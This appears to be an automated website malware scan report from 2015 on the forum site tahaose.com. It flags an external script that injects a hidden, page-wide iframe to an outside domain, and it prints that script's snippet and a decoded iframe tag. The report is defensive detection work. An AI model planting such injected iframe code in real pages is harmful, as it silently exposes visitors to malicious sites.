Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tahaose.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://tahaose.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 20:51:42 GMT Location: forum.php Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://tahaose.com/forum.php | 200 OK Content-Length: 51853 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: l3v65la.tahaose.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>ÎÒºÃÉ«-ËûҲߣ-ËýҲߣ</title> <meta name="keywords" content="ÎÒºÃÉ«-ËûҲߣ" /> <meta name="description" content="ÎÒºÃÉ«,ÎÒºÃÉ«ÐÅÏ¢ ...[4344 bytes skipped]... | ||
http://tahaose.com/static/js/common.js?jOp | 200 OK Content-Length: 63289 Content-Type: application/x-javascript | clean |
http://tahaose.com/template/win8mi_2nd_tech/src/js/jquery.min.js | 200 OK Content-Length: 94866 Content-Type: application/x-javascript | clean |
http://kvbjf.pw/bbs.js | 200 OK Content-Length: 1117 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: www.yuxiangwu.org document.writeln("<iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.yuxiangwu.org/></iframe>");
function browserRedirect() { var sUserAgent = navigator.userAgent.toLowerCase(); var bIsIpad = sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs = sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp = sUserAgent.match(/midp/i) == "midp"; var bIsUc7 = sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; ...[528 bytes skipped]... Decoded script: <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowTransparency src=http://www.yuxiangwu.org/></iframe> Malicious iFrame found. size: 100x2450 src: http://www.yuxiangwu.org/ This URL is marked by Google as suspicious <iframe scrolling='no' frameborder='0' marginheight='0' marginwidth='0' width='100%' height='2450' allowtransparency src=http://www.yuxiangwu.org/> | ||
http://tahaose.com/static/js/forum.js?jOp | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
http://tahaose.com/static/js/logging.js?jOp | 200 OK Content-Length: 603 Content-Type: application/x-javascript | clean |
http://tahaose.com/template/win8mi_2nd_tech/src/js/nav.js | 200 OK Content-Length: 1708 Content-Type: application/x-javascript | clean |
http://tahaose.com/template/win8mi_2nd_tech/src/js/superslide.2.1.js | 200 OK Content-Length: 11270 Content-Type: application/x-javascript | clean |
http://js.users.51.la/16946601.js | 200 OK Content-Length: 1980 Content-Type: application/x-javascript | clean |
http://tahaose.com/home.php?mod=misc&ac=sendmail&rand=1421095903 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://tahaose.com/./ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 20:52:02 GMT Location: forum.php Server: Microsoft-IIS/6.0 Content-Type: text/html X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.17 | clean |
http://tahaose.com/./forum.php | 200 OK Content-Length: 51854 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: l3v65la.tahaose.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=gbk" /> <title>ÎÒºÃÉ«-ËûҲߣ-ËýҲߣ</title> <meta name="keywords" content="ÎÒºÃÉ«-ËûҲߣ" /> <meta name="description" content="ÎÒºÃÉ«,ÎÒºÃÉ«ÐÅÏ¢ ...[4344 bytes skipped]... | ||
http://tahaose.com/./static/js/common.js?jOp | 200 OK Content-Length: 63289 Content-Type: application/x-javascript | clean |
http://tahaose.com/./template/win8mi_2nd_tech/src/js/jquery.min.js | 200 OK Content-Length: 94866 Content-Type: application/x-javascript | clean |
http://tahaose.com/./static/js/forum.js?jOp | 200 OK Content-Length: 22720 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tahaose.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 20:51:42 GMT
Location: forum.php
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: tahaose.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 20:51:42 GMT
Location: forum.php
Server: Microsoft-IIS/6.0
Content-Type: text/html
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: tahaose.com
Referer: http://www.google.com/search?q=tahaose.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tahaose.com
Referer: http://www.google.com/search?q=tahaose.com
Result:
The result is similar to the first query. There are no suspicious redirects found.